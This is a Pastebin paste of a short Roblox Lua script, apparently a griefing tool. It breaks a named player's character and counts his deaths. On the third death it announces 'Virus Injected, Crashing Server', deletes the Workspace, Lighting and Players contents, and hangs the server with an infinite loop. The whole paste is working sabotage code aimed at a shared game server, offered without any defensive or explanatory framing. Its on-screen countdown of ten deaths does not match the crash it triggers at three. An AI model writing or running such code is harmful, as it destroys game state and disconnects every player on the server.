Advertisement
memberhero

Untitled

May 8th, 2016
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1. Workspace.memberhero:BreakJoints()
  2.  
  3. local num = 0
  4.  
  5. game.Players.memberhero.CharacterAdded:connect(function(char)
  6.  
  7. repeat wait() until char:findFirstChild("Humanoid")
  8.  
  9. char.Humanoid.Died:connect(function()
  10.  
  11. num = num + 1
  12.  
  13. local Msg = Instance.new("Message")
  14.  
  15. Msg.Parent = game.Workspace
  16.  
  17. Msg.Text = "Someone has killed memberhero, If he dies "..10-num.." more times the server will crash"
  18.  
  19. wait(5)
  20.  
  21. Msg:remove()
  22.  
  23. if num == 3 then
  24.  
  25. local Msg = Instance.new("Message")
  26.  
  27. Msg.Parent = game.Workspace
  28.  
  29. Msg.Text = "Virus Injected, Crashing Server"
  30.  
  31. wait(5)
  32.  
  33. pcall(function()
  34.  
  35. game:GetService("Workspace"):ClearAllChildren()
  36.  
  37. end)
  38.  
  39. game:GetService("Lighting"):ClearAllChildren()
  40.  
  41. game:GetService("Players"):ClearAllChildren()
  42.  
  43. Instance.new("ManualSurfaceJointInstance")
  44.  
  45. while true do end
  46.  
  47. end
  48.  
  49. end)
  50.  
  51. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement